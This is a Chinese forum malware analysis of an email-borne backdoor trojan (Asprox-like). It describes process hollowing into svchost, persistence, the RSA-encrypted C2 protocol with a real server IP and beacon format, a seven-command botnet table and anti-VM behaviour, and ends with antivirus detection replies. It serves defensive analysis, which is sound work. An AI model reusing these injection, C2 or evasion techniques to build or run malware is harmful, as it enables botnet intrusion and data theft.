后门木马分析+哈勃分析报告

岁月神偷7

样本MD5:
a5fac16085cf929978db685b8197d887

哈勃自动分析报告：
http://habo.qq.com/file/showdetail?pk=ADcGYl1sB28=

样本下载地址：


一、基本信息
文件名：PlainNote_copy.exe
病毒类型：后门木马
文件大小：138KB
加壳类型：无
样本来源：SNS邮箱
二、木马概述
　　从木马特征来看，这是一个大规模抓鸡木马中了此木马，电脑就被暴露在黑客控制下，成为僵尸网络的一部份。该木马通过邮箱传播，木马以附件方式发送。木马的图标为doc文件的图像，极具诱惑性。
　　

　　从木马服务器的指令可以看出，黑客通过分组分类实现大量“肉鸡”自动化管理，维护僵尸网络。
　　木马通过两次“换身脱壳”最终创建svchost.exe傀儡进程。木马值入电脑后，并不会大张旗鼓地“办事”，而是访问远程服务，请求指令，接受指令后才办事。通信采用http方式，数据采用非对称加密算法加密，样本里保存通信的公钥，服务器保存私钥。与食猫鼠有点相似，新模块不会落地，都是在内存中运行。指令有休眠指令（可以sleep 10天甚至一个月）、有下载新模块指令、有更新程序指令、有自毁指令（清除痕迹自卸载）等。而且有反虚拟机和抓包工具的行为。
三、分析过程
　　1．第一次“换身脱壳”
　　再创建母体进程，创建进程，通过WriteProcessMemory写入shellcode和修改PEB的映像基址，然后调用ResumeThread让线程跑起来执行shellcode的行为。退出进程。
CALL 到 CreateProcessA 来自 a5fac160.4F4013C6
|ModuleFileName = "C:\Documents and Settings\Administrator\桌面\a5fac16085cf929978db685b8197d887.exe"
|CommandLine = NULL
|pProcessSecurity = NULL
|pThreadSecurity = NULL
|InheritHandles = FALSE
|CreationFlags = CREATE_SUSPENDED
|pEnvironment = NULL
|CurrentDir = NULL
|pStartupInfo = 0012FE70
\pProcessInfo = 0012FEC0
　　2． 再svchost.exe(系统正常文件)进程，通微软未公开API函数MapViewOfSection注入shellcode然后通过ResumeThread让线程跑起来执行shellcode的行为。退出进程。到这里只有svchost.exe傀儡进程运行着。
　　3．GetUserNameA得到用户，调用CreateMutex创建互斥，保证当前唯一实例在运行，互斥量名:aa+用户，如aaAdminstrator。
　　4．拷贝母体到C:\Documents and Settings\Administrator\Local Settings\Application Data目录下。
       
然后创建自启动项。
       
　　5．采用非对称加密算法加密通信数据。
调用Wininet AIP访问服务器，如下图:
       
　　母体拥有加密的公钥，而木马远程服务器拥有加密的私钥。
　　公钥密钥如下：
-----BEGIN PUBLIC KEY-----\r\nMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDh1cXNl5TSGcC5OrnDBc+fdN/0\r\nPblnZEAOlryK65eKdaNAIi0okxHTfCHKZQWEz8LOzQRclzg+SilO+jbesgZg/Y7U\r\nc8edpo93cM0eyVE7Pi5n73I/lLyvD/gDby80FQmj1sbayyHR2DG8heeJJ2TRTfzD\r\nr6V/45jRqvvUfgl+swIDAQAB\r\n-----END PUBLIC KEY-----
　　根据非对称加密算法原理得知，母体加密的数据，必须用私钥才能解密，相反服务器加密的数据，要公钥才能解密，就算第三方监听软件得到数据后，也无法解密，从而保证数据安全。
　　
　　6．访问服务器，请求指令。
　　采用http方式与木马服务器通信，端口是443，但它并不是使用https协议，木马这种做是为了伪装成https的数据流，混崤于正常数据流中。如图：
       
【send】
URL : http://222.124.166.12:443/60BEFE ... 94B8DA9BC1FB55514F0
未加密的数据：<knock><id>60BEFE6A87DBB6D0E1C63DD52509D910</id><group>2608s</group><src>3</src><transport>0</transport><time>1712272722</time><version>2050</version><status>0</status><debug>none.none.none</debug></knock>
<id>60BEFE6A87DBB6D0E1C63DD52509D910</id> : 母体编号，区别其它变种母体。
<group>2608s</group> : 分组标志，方便服务统一管理
version>2050</version> : 版本号
【recv】
解密数据：
<knock><id>60BEFE6A87DBB6D0E1C63DD52509D910</id><task type="idl" /></knock>
task type="idl" ： idl是服务器指令，这是一休眠指令，除了idl 还有其它6条指令，相对于idl指令，这6条指令会附带其它数据参数。其它6条指令如下：
       
指令表：
        指令        功能
1        idl        休眠指令，休眠可以达到1天或者更长
2        run        运行下载的模块，通过创建傀儡进程方式执行。
3        rem        卸载木马（删除相关注册表信息和文件）
4        ear        运行下载的模块，且压缩数据，监控到的数据，如图片
5        rdl        检测和设置注册表记录木马状态
6        red        重启木马（删除旧文件，结束旧程序，启动新木马）用于木马升级后
7        upd        木马升级（释放新母体）

【idl指令】
读取指令参数，如下图：
       
调用sleep休眠,如下图：
       
【run指令】
     从服务器得到shellcode，然后通过创建傀儡svchost进程，执行shellcode代码，用来完成指定具体的功能。
       
【rem指令】
  卸载指令，结束相关进程，删除相关文件和注册表，如下图：
       
【ear指令】
　　创建下载的shellcode模块，且压缩数据，监控到的数据，如图片。在母体目录下创建收集数据文件。如下图：
　　
【rdl指令】
　　检测和设置注册表记录木马状态，如下图：
       
【red指令】
    删除旧文件，结束旧程序，接收服务的数据后，创建落地新母体，然后运行新母体。如下图：
　　
【upd指令】
    从服务器接收到新母体数据，然后更新到母体目录下，并修改自启动项，指向新母体，如下图：
       

XywCloud

Baidu Antivirus杀
费尔杀

cxy密斯

BD无情地拦截了下载

Love=卡巴+费尔

b573684723

好压Q管云EAVKILL

火绒扫描MISS

欧阳宣

Trojan.Downloader.JQZZ (引擎A)

wjy19800315

欧阳宣 发表于 2014-9-5 16:38
Trojan.Downloader.JQZZ (引擎A)

你用的什么杀软，怎么还分A,B引擎啊

欧阳宣

wjy19800315 发表于 2014-9-5 16:57
你用的什么杀软，怎么还分A,B引擎啊

www.gdata-china.com

yicun

Trojan.Downloader.JQZZ
C:\Users\Eric\Desktop\a5fac16085cf929978db685b8197d887.rar\a5fac16085cf929978db685b8197d887

fuzhk

这家伙动作太大，铁壳居然入库了。。

1. 文件名: a5fac16085cf929978db685b8197d887
   
2. 威胁名称: Trojan.Asprox.B
   
3. 完整路径: f:\infected\a5fac16085cf929978db685b8197d887\a5fac16085cf929978db685b8197d887
   
4. 
   
5. ____________________________
   
6. 
   
7. 
   
8. 
   
9. 详细信息
   
10. 未知的社区使用情况,  未知的文件存在时间,  风险 高
    
11. 
    
12. 
    
13. 
    
14. 
    
15. 
    
16. 原始
    
17. 下载自
    
18.  未知
    
19. 
    
20. 
    
21. 
    
22. 
    
23. 
    
24. 活动
    
25. 已执行的操作: 已执行的操作: 1
    
26. 
    
27. 
    
28. 
    
29. ____________________________
    
30. 
    
31. 
    
32. 
    
33. 在电脑上的创建时间 
    
34. 2014/9/5 ( 17:12:42 )
    
35. 
    
36. 
    
37. 上次使用时间 
    
38. 2014/9/5 ( 17:12:42 )
    
39. 
    
40. 
    
41. 启动项目 
    
42. 否
    
43. 
    
44. 
    
45. 已启动 
    
46. 否
    
47. 
    
48. 
    
49. ____________________________
    
50. 
    
51. 
    
52. 未知
    
53. 诺顿社区中使用了此文件的用户数 未知。
    
54. 
    
55. 未知
    
56. 此文件版本当前 未知。
    
57. 
    
58. 高
    
59. 此文件具有高风险。
    
60. 
    
61. 威胁类型: 病毒。 将自身插入或附加到其他程序、文件或电脑区域以感染这些媒介的程序。
    
62. 
    
63. 
    
64. 
    
65. ____________________________
    
66. 
    
67. 
    
68. 
    
69. 来源: 外部介质
    
70. 
    
71. 
    
72. 
    
73. ____________________________
    
74. 
    
75. 文件操作
    
76. 
    
77. 文件: f:\infected\a5fac16085cf929978db685b8197d887\ a5fac16085cf929978db685b8197d887 已阻止
    
78. ____________________________
    
79. 
    
80. 
    
81. 文件指纹 - SHA:
    
82. 83832daa37e1dcb23c52b97f54d8b74d0fbc77cec4a81fddb181c906c214ec4f
    
83. 文件指纹 - MD5:
    
84. 不可用
    

复制代码